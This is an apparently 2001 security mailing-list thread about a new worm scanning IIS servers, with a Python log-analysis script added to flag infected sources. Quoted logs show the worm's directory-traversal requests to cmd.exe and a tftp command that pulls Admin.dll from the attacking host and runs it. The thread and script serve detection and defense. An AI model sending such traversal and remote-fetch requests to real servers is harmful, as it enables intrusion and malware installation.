-----Original Message-----
From: Luke Butcher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:06 PM
To: [EMAIL PROTECTED]
Subject: RE: something new afoot, sweeping scans:

Seeing hits from this new worm, looks like it tries circa 30 URLs.
Logic looks similar to Code Red II/III, in that most hits are coming from similar class B and C networks. Not sure of payload though as we're protected.
Regards,
Luke Butcher
Em: [EMAIL PROTECTED]
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 5:50 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED]
> Subject: Re: something new afoot, sweeping scans:
>
>
> I haven't been able to get a copy of the worm yet, but
> it scans IIS machines for vulnerabilities able to run
> cmd.exe?\dir+c, then if that works, sends an attempt
> to run tftp back to itself and grab "Admin.dll", then
> run it.
>
> Here are some logs:
>
> Tue Sep 18 09:43:13 2001: 38.214.180.8 -> x.x.1.29: 1888 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2460 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2038.214.180.8%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
> Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2500 -> 80 GET /scripts/..%252f../Admin.dll HTTP/1.0
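The three-request sequence in the quoted logs (double-encoded traversal probe against cmd.exe, a tftp fetch of Admin.dll, then a request for the dropped file) can be picked out of web or IDS logs per source host. The following is an added example, not code from the thread; it assumes the log line format shown above, and the 10.0.0.5 request in the sample is constructed for contrast.

```python
import re
from urllib.parse import unquote

# Constructed sample in the format of the log lines quoted above; 10.0.0.5 is a made-up benign request.
SAMPLE_LOG = """\
Tue Sep 18 09:43:13 2001: 38.214.180.8 -> x.x.1.29: 1888 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2460 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2038.214.180.8%20GET%20Admin.dll%20e:\\Admin.dll HTTP/1.0
Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2500 -> 80 GET /scripts/..%252f../Admin.dll HTTP/1.0
Tue Sep 18 09:44:02 2001: 10.0.0.5 -> x.x.1.29: 3001 -> 80 GET /index.html HTTP/1.0
"""

LINE_RE = re.compile(r"^(?P<ts>.+?): (?P<src>\S+) -> (?P<dst>\S+): \d+ -> \d+ "
                     r"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/\d\.\d$")

def decode_twice(url):
    """Undo double encoding (%252f -> %2f -> /); '+' in the query is a space to cmd.exe."""
    path, _, query = unquote(unquote(url)).partition("?")
    return path.lower(), query.replace("+", " ").lower()

def is_double_encoded(url):
    """True when a second decode pass still changes the URL."""
    return unquote(url) != unquote(unquote(url))

def classify(url):
    """Map one request to a stage of the chain described above, or None."""
    path, query = decode_twice(url)
    if "../" not in path and "..\\" not in path:
        return None
    if path.endswith("/cmd.exe") and query.startswith("/c dir"):
        return "traversal-probe"
    if path.endswith("/cmd.exe") and "tftp" in query and "admin.dll" in query:
        return "tftp-fetch"
    if path.endswith("/admin.dll"):
        return "run-payload"
    return None

def analyze(log_text):
    """Suspicious requests grouped by source IP, in log order, so the
    probe -> fetch -> run sequence from one host stands out."""
    stages = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and (stage := classify(m["url"])):
            stages.setdefault(m["src"], []).append(stage)
    return stages

def likely_infected(log_text):
    """Sources that completed the whole chain (probe, fetch, run)."""
    needed = ("traversal-probe", "tftp-fetch", "run-payload")
    return [src for src, seq in analyze(log_text).items()
            if all(s in seq for s in needed)]
```

Running it on the sample flags only 38.214.180.8, since the benign request neither traverses nor is double-encoded.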
Title: RE: something new afoot, sweeping scans:

My Pix is filtering out tons of SYN connections to port 80 from several sub domains on 209.x.x.x. This part of it? I am assuming so.
.......................................................................................................
Dean M. Dorman
Systems Administrator
Putnam Company / Acorn Markets
PGP Key fingerprint: 6ABF BAF4 7784 1F54 18A6 C8A6 C788 4C14 22C2 5A75
........................................................................................................